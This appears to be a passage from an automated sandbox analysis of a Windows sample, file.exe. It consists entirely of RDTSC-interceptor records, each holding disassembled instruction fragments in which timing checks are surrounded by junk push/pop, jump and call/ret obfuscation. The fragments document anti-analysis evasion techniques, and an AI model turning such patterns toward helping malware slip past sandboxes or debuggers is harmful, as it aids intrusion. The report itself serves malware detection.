              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BDC4 second address: 90BDD3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD978BA9B16h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C1AE second address: 90C1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C578 second address: 90C596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jg 00007FD978BA9B16h 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 jne 00007FD978BA9B16h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C596 second address: 90C5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C72C second address: 90C751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FD978BA9B1Dh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d je 00007FD978BA9B16h 0x00000013 popad 0x00000014 push esi 0x00000015 jno 00007FD978BA9B16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C751 second address: 90C7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 jg 00007FD979248A95h 0x0000000d jg 00007FD979248A7Ch 0x00000013 jng 00007FD979248A90h 0x00000019 jmp 00007FD979248A84h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910081 second address: 910085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9100DB second address: 9100F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD979248A83h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910371 second address: 9103A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FD978BA9B1Ah 0x00000012 pushad 0x00000013 jmp 00007FD978BA9B27h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9108B6 second address: 9108BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910DE6 second address: 910DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910DEA second address: 910DEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910EC2 second address: 910EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910EC6 second address: 910ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910ECC second address: 910ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9112B6 second address: 9112BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911C78 second address: 911C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911B01 second address: 911B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91367A second address: 913680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913680 second address: 913684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913684 second address: 913688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9141B3 second address: 9141B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9141B9 second address: 9141BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9141BE second address: 9141F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add esi, dword ptr [ebp+124728B6h] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D1BEFh], edx 0x0000001b push 00000000h 0x0000001d jne 00007FD979248A7Ch 0x00000023 xchg eax, ebx 0x00000024 push ebx 0x00000025 jnp 00007FD979248A78h 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push esi 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914A44 second address: 914A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914A48 second address: 914A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914A62 second address: 914A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD978BA9B16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914A6C second address: 914A7B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914A7B second address: 914A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914A81 second address: 914A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914A87 second address: 914A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914A8B second address: 914B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FD979248A78h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov esi, 461A8A00h 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D28EAh], eax 0x00000033 jmp 00007FD979248A82h 0x00000038 push 00000000h 0x0000003a or di, 078Fh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FD979248A7Ch 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914B00 second address: 914B06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914B06 second address: 914B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD979248A76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913EEE second address: 913F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007FD978BA9B16h 0x00000011 jc 00007FD978BA9B16h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916068 second address: 916082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A86h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916082 second address: 9160F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD978BA9B18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 or edi, 384C611Ch 0x0000002b push 00000000h 0x0000002d xor esi, dword ptr [ebp+122D182Dh] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FD978BA9B18h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f or esi, dword ptr [ebp+122D344Dh] 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FD978BA9B24h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915E31 second address: 915E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jno 00007FD979248A76h 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917FEE second address: 917FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917FF2 second address: 917FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917FF8 second address: 917FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91965C second address: 9196CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FD979248A7Ch 0x0000000b ja 00007FD979248A76h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov bx, si 0x00000018 push 00000000h 0x0000001a jc 00007FD979248A7Bh 0x00000020 add bx, 56BEh 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FD979248A78h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 movzx ebx, si 0x00000044 xchg eax, esi 0x00000045 jno 00007FD979248A8Dh 0x0000004b push eax 0x0000004c pushad 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E533 second address: 91E539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E539 second address: 91E53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91A7F9 second address: 91A7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D8D8 second address: 91D8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E53D second address: 91E541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91A7FE second address: 91A804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E541 second address: 91E5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add di, 0E18h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FD978BA9B18h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007FD978BA9B18h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jp 00007FD978BA9B16h 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920490 second address: 92049D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9213D1 second address: 9213D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922402 second address: 922411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A7Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922411 second address: 9224BE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007FD978BA9B24h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FD978BA9B18h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e jmp 00007FD978BA9B29h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FD978BA9B18h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov ebx, esi 0x00000051 push 00000000h 0x00000053 and bx, B5D7h 0x00000058 jno 00007FD978BA9B1Eh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007FD978BA9B1Bh 0x00000066 js 00007FD978BA9B16h 0x0000006c popad 0x0000006d pop eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push ecx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923497 second address: 92351A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD979248A81h 0x0000000f nop 0x00000010 jmp 00007FD979248A7Fh 0x00000015 push 00000000h 0x00000017 jp 00007FD979248A79h 0x0000001d mov di, cx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FD979248A78h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov di, 71D1h 0x00000040 xor ebx, dword ptr [ebp+122D3605h] 0x00000046 jnc 00007FD979248A79h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FD979248A7Ch 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9264B6 second address: 9264BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9264BE second address: 9264DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD979248A76h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jnc 00007FD979248A7Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921664 second address: 921673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A3AE second address: 92A3C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A3C9 second address: 92A3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A3CF second address: 92A3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A3D3 second address: 92A3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F299 second address: 92F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FD979248A82h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F2B2 second address: 92F2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD978BA9B25h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F2CD second address: 92F2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F2D1 second address: 92F2F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B23h 0x00000007 jo 00007FD978BA9B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932C15 second address: 932C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9322CF second address: 9322D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9322D4 second address: 9322EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD979248A7Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9325C6 second address: 9325E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD978BA9B27h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9325E4 second address: 9325F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932784 second address: 93279B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B1Eh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93279B second address: 9327A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007FD979248A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9327A7 second address: 9327C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FD978BA9B1Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9327C4 second address: 9327CE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD979248A7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92260A second address: 922629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD978BA9B1Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922629 second address: 922630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9226F6 second address: 9226FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92466A second address: 924746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007FD979248A96h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FD979248A78h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b xor dword ptr [ebp+122D20E9h], edx 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov bx, dx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 add dword ptr [ebp+122D1C80h], ecx 0x00000048 jmp 00007FD979248A87h 0x0000004d mov eax, dword ptr [ebp+122D0DB1h] 0x00000053 mov edi, dword ptr [ebp+122D3469h] 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push eax 0x0000005e call 00007FD979248A78h 0x00000063 pop eax 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 add dword ptr [esp+04h], 00000018h 0x00000070 inc eax 0x00000071 push eax 0x00000072 ret 0x00000073 pop eax 0x00000074 ret 0x00000075 nop 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007FD979248A87h 0x0000007e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924746 second address: 92475C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FD978BA9B1Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92574F second address: 925753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925753 second address: 92575D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
